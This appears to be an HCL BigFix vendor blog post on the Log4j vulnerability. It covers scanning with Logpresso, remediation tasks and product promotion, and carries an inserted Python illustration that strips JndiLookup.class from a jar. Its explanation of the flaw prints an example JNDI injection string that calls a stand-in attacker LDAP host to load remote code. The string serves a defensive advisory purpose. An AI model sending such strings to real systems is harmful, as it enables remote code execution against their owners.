Nearly every global enterprise or organization is facing pressure to fix what experts are calling one of the most serious software vulnerabilities in recent memory. It is broad-based and easy to exploit.

The flaw in the Log4j software could allow hackers unfettered access to computer systems and has prompted an urgent warning by the U.S. government’s cybersecurity agency.

Attacks were observed less than a day after the vulnerability was reported. It currently carries a base score of 10 and has been labelled critical severity by the GitHub advisory.

Log4j is everywhere. Apache Log4j is a popular Java library developed and maintained by the Apache Foundation. It is widely adopted and used in many commercial and open-source software products as a logging framework for Java. It is estimated that hundreds of millions of devices are at risk, including government and commercial devices as well as home consumer devices, because Apache Log4j is in ubiquitous use across the world's computing ecosystem. In addition, each affected device may have dozens or hundreds of places where the vulnerable code resides, as logging is an extremely common action in all of computing.

Why is it so serious?

The Log4j vulnerability is critical because it can be exploited remotely by an unauthenticated adversary to execute arbitrary code (remote code execution, or RCE). The vulnerability scores 10/10 in the MITRE.org Common Vulnerability Scoring System (CVSS), which indicates how severe it is. The RCE is possible because of how log messages are handled by the log4j code. If an attacker sends a message that contains a string like ${jndi:ldap://dirtyLDAP.com/X}, the message lookup may load an external code class from that location and execute it, giving the threat actor arbitrary code execution WITHOUT authentication.

In summary, this is a massive vulnerability that affects hundreds of millions of devices across the entire worldwide computing ecosystem and locating these vulnerable areas of code and remediating them is of utmost importance and urgency. Fortunately, BigFix is designed to help with exactly these kinds of scenarios.

We are working alongside our customers, security experts, and IT Operations to produce vulnerability identification and remediation content that will help you identify and fix the Log4j impacts in your environment.

The situation we are all facing is fluid. We are reacting in real time to new variations of the vulnerabilities as they are announced, and working to keep the latest guidance to you, our customers, up to date and current. We constantly assess and consume the best guidance from Apache, security experts, and patches from software vendors, as well as crafting solutions that work with the BigFix product and tool suite.

When you use these solutions, it is incumbent on your organization to test them across the broadest available system base, including the various operating systems, storage solutions, and application inventory you run. Realize that certain remediation steps may damage applications in your ecosystem, depending on which kind of mitigation is being deployed. Use caution, test in smaller, controlled environments, and be prepared with a restoration plan in case things go awry.

Discover: How do I use BigFix to scan for the Log4j vulnerability?

The general scanning process is:

  • Download, Import, and Activate the Analysis to report the Log4j-scan results.
  • Download and import one or more of the Log4j-scan Tasks.
  • Execute the scans that are appropriate for your environment to collect results.

Which scans should I use?

We have currently developed five different scans, and six different Remediation Fixlets. All report results in the same way, and all generate the same outputs. Which ones should you use?

OS-Specific Binary Scans

These three scans download a prebuilt binary for a limited set of operating systems. These may have issues if you don’t have certain prerequisites installed, including Visual C++ Runtime on Windows, or specific glibc versions on Linux.

More recent versions of Logpresso Log4j-scan are "static-compiled", which reduces these compatibility issues but may not eliminate them entirely. If you need the smallest possible downloads, and your operating systems support these binary scans, feel free to use them. If you do encounter any compatibility issues, switch to one of the Java-based scans below.
>>Logpresso Scanner - Linux
>>Logpresso Scanner - Mac
>>Logpresso Scanner - Windows

Java-based scanner, with existing Java installation

If your systems already have Java installed, and it is at least JRE 7, you may use the “Universal Java” Scan. This provides the widest range of compatibility, able to handle many operating systems for which we have not created specific JRE downloads, such as 32-bit Linux, Solaris, AIX, and even Raspbian.
>>Logpresso Scanner - Universal

Java-based scanner, with a downloaded JRE

For systems that do not have Java installed, or whose installed Java is too old to run Logpresso Log4j-scan, we have ongoing work on a Task that downloads a temporary Java Runtime to execute the scanner. Currently we provide downloads for 32-bit Windows, 64-bit Windows, 64-bit Linux and Mac. We will be focusing work on this over the next few days to add more Java runtimes; 32-bit Linux, AIX, Solaris, and HP-UX are planned.

HCL BigFix is currently recommending the free Logpresso scanner for targeted and deep interrogation of your software. What is Logpresso, and why is BigFix leveraging it?

  • Logpresso is a cyber security and data analytics company based in South Korea.
  • The Logpresso Log4j scanner is an open-source, Java-based scanner, available on GitHub, developed by the Logpresso technical team, and made freely available to the cybersecurity community.

a. The Logpresso scanner can search not only in .jar files, but also in compressed archive files including .ear and .war files, which means a more complete scan result.

b. As a benefit to our customers, the BigFix product team has created customized automation content for Logpresso that amplifies its effectiveness at finding Log4j instances in your application environment.

c. There is no reason why you cannot use any other good scanner (e.g., one that you write yourself, or ones available from other sources).

Remember that BigFix acts as a force-multiplier for Logpresso, or ANY other scanner or remediation code, by letting you scale scanning and remediation across tens of thousands of devices, multiple OSes, and disparate hardware.

Remediate: How should I use BigFix to do remediations before patches are available from the application vendors?

BigFix has a set of Remediation tasks based on Logpresso Log4j-scan results. All of these are use-at-your-own-risk: test them first. It is difficult for us to predict which applications may be broken by any of these remediations in your setting. However, given the severity of these issues, we felt it important to provide options while we all wait for patches from individual software vendors.

These are split into two categories:

Logpresso Log4j-scan remediation

The Logpresso Log4j-scan utility itself can perform some remediations. Specifically, it opens the log4j-core-2.x.jar file and removes JndiLookup.class from it, following the guidance recommended on the Apache security page. This mitigates the worst of the CVEs but may not mitigate the more recent, denial-of-service based vulnerabilities. Still, this can be a very effective step to take, providing the most protection while maintaining the best backward compatibility with existing applications.

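To make concrete what the scanner and this remediation do (searching nested .war/.ear archives for log4j-core, then stripping JndiLookup.class from a directly accessible jar while keeping a backup), here is an added Python illustration. It is not Logpresso's or BigFix's code; the jar, the war and the class-file bytes are constructed sample data, and the real scanner does considerably more.

```python
import io
import shutil
import tempfile
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"  # class removed per Apache's guidance
NESTED_EXTS = (".jar", ".war", ".ear")

def find_jndi_lookup(data, label):
    """Labels ('outer!inner') of archives in `data` containing JndiLookup.class;
    recurses into nested .jar/.war/.ear entries so a bundled log4j-core is found."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name == JNDI_CLASS:
                hits.append(label)
            elif name.lower().endswith(NESTED_EXTS):
                hits += find_jndi_lookup(zf.read(name), f"{label}!{name}")
    return hits

def remove_jndi_lookup(jar_path):
    """Rewrite the jar without JndiLookup.class, keeping a .bak copy of the original.
    Only a directly accessible jar is handled; nested archives are not descended."""
    jar_path = Path(jar_path)
    backup = jar_path.with_suffix(jar_path.suffix + ".bak")
    shutil.copy2(jar_path, backup)
    removed = 0
    with zipfile.ZipFile(backup) as src, zipfile.ZipFile(jar_path, "w") as dst:
        for item in src.infolist():
            if item.filename == JNDI_CLASS:
                removed += 1
                continue  # drop the lookup class, copy everything else verbatim
            dst.writestr(item, src.read(item.filename))
    return removed

def demo():
    """Constructed sample: a log4j-core-like jar on disk plus a .war that bundles it."""
    work = Path(tempfile.mkdtemp())
    jar_path = work / "log4j-core-2.14.1.jar"
    with zipfile.ZipFile(jar_path, "w") as zf:
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    war_path = work / "app.war"
    with zipfile.ZipFile(war_path, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", jar_path.read_bytes())
    war_hits = find_jndi_lookup(war_path.read_bytes(), "app.war")
    removed = remove_jndi_lookup(jar_path)
    after = find_jndi_lookup(jar_path.read_bytes(), "log4j-core-2.14.1.jar")
    return war_hits, removed, after, jar_path.with_suffix(".jar.bak").exists()
```

Note that the scanner side finds the class inside the war, but the remediation side deliberately touches only the standalone jar, matching the limitation described later for the replacement task.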
For each of our Logpresso scans, we provide a Mitigation task:

Logpresso Remediation - Windows
Logpresso Remediation - Linux
Logpresso Remediation - Mac
Logpresso Remediation - Java - Universal
Logpresso Remediation - Java - With Temporary JRE

log4j-core-2.17.0.jar replacement

Additionally, we provide a Task that, instead of modifying log4j-core, replaces the log4j-core-2.x.jar file with the latest 2.17.0 version. This closes all of the known CVEs but could be more likely to introduce compatibility problems with the applications that depend on Log4j.

This task parses the output log of a previous Logpresso Log4j-scan task and, where possible, replaces the log4j-core-2.x.jar file.

When we replace the file, we keep the original version’s filename, which can help reduce compatibility problems. The original file is backed up so it can be restored later if necessary.


Limitations:

a. Does not descend within embedded JAR, WAR, or EAR files. Only replaces the log4j-core-2.x.jar where it is directly accessible in the filesystem.

b. Does not replace Log4j 1.x versions.

Log4j Mitigation - Replace Log4j with 2.17.0

Check for the Latest: Please review these sites for more information and check back frequently

Current summary page for BigFix response: ->
BigFix Inventory Update: ->
Using BigFix Inventory to find Log4J: ->
Blog: ->
Webinar: ->
Scan Task: ->
Analysis Results: ->
Knowledge base article: ->

Additional help is available at https://bigfix.me and at https://support.hcltechsw.com/.

Fixlets will also be available on an ongoing basis as your BigFix team continues to work on this around the clock.

IT Operations is essential to beating this. BigFix is the essential tool for IT Operations.

BigFix automates discovery, management, and remediation of all endpoints whether on-premises, mobile, virtual, or in the cloud – regardless of the operating system, location, or connectivity. BigFix Insights for Vulnerability Remediation integrates with leading vulnerability management solutions like Tenable to remediate vulnerabilities like Log4j faster than any other solution in the market.

With BigFix, you can manage every endpoint, now and in the future.

BigFix has provided customers with specialized tools to help find Log4j wherever it exists in their environment, including file systems, across nearly 100 operating system variants.

Try BigFix Today!

One endpoint management platform enabling IT Operations and Security teams to automate discovery, management and remediation – whether it's on-premises, virtual, or cloud – regardless of operating system, location or connectivity.